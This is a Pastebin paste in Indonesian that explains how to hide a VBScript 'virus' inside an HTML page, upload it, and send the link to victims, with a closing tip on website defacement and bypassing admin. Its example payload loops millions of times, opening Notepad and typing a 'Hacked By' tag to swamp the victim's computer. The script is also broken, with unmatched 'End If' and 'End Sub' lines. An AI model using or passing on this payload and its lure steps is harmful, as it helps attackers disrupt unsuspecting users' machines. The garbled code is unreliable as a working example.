Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Catatan II
- - Jika Ingin Memasukan Virus .vbs Ke HTML pastikan Virus Tidak Di Encrypt
- - Masukan Kode HTML khusus Sebelum Memasukan Virus
- - Virus Hanya Akan Berkerja Pada Komputer Dan Menginfeksi Komputer Dari Browser Web
- - Pastikan Upload Di Web Agar Berkerja
- - Salin Link HTML Terinfeksi Yang Sudah Di Upload Di Web Dan Berikan Pada Korban Pengguna Komputer
- Kode
- = <script language="vbscript">...</script>
- * ... Isilah Dengan Virus .vbs
- Contoh :
- <html>
- <body>
- <h1>
- Hello World
- </h1>
- <script language="vbscript">
- On Error Resume Next
- set wshshell = wscript.CreateObject("wScript.Shell")
- dim n
- for n = 1 to 100000000
- wshshell.run "Notepad"
- wscript.sleep 400
- wshshell.sendkeys "H"
- wscript.sleep 100
- wshshell.sendkeys "a"
- wscript.sleep 120
- wshshell.sendkeys "c"
- wscript.sleep 200
- wshshell.sendkeys "k"
- wscript.sleep 100
- wshshell.sendkeys "e"
- wscript.sleep 140
- wshshell.sendkeys "d"
- wscript.sleep 100
- wshshell.sendkeys " "
- wscript.sleep 50
- wshshell.sendkeys "B"
- wscript.sleep 120
- wshshell.sendkeys "y"
- wscript.sleep 170
- wshshell.sendkeys " "
- wscript.sleep 100
- wshshell.sendkeys "A"
- wscript.sleep 50
- wshshell.sendkeys "r"
- wscript.sleep 120
- wshshell.sendkeys "i"
- wscript.sleep 160
- wshshell.sendkeys "y"
- wscript.sleep 200
- wshshell.sendkeys "a"
- wscript.sleep 100
- wshshell.sendkeys "n"
- wscript.sleep 100
- wshshell.sendkeys "X"
- wscript.sleep 100
- wshshell.sendkeys "p"
- wscript.sleep 100
- wshshell.sendkeys "l"
- wscript.sleep 100
- wshshell.sendkeys "o"
- wscript.sleep 100
- wshshell.sendkeys "i"
- wscript.sleep 100
- wshshell.sendkeys "t"
- wscript.sleep 100
- wshshell.sendkeys "4"
- wscript.sleep 100
- wshshell.sendkeys "0"
- wscript.sleep 100
- wshshell.sendkeys "4"
- End If
- End Sub
- </script>
- </body>
- </html>
- (Jika Kau Defacer Pasti Paham lah Caranya Defacingnya_-)
- (Agar Lebih Efektif Lagi Pastikan Defacingnya Dengan By Pass Admin)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement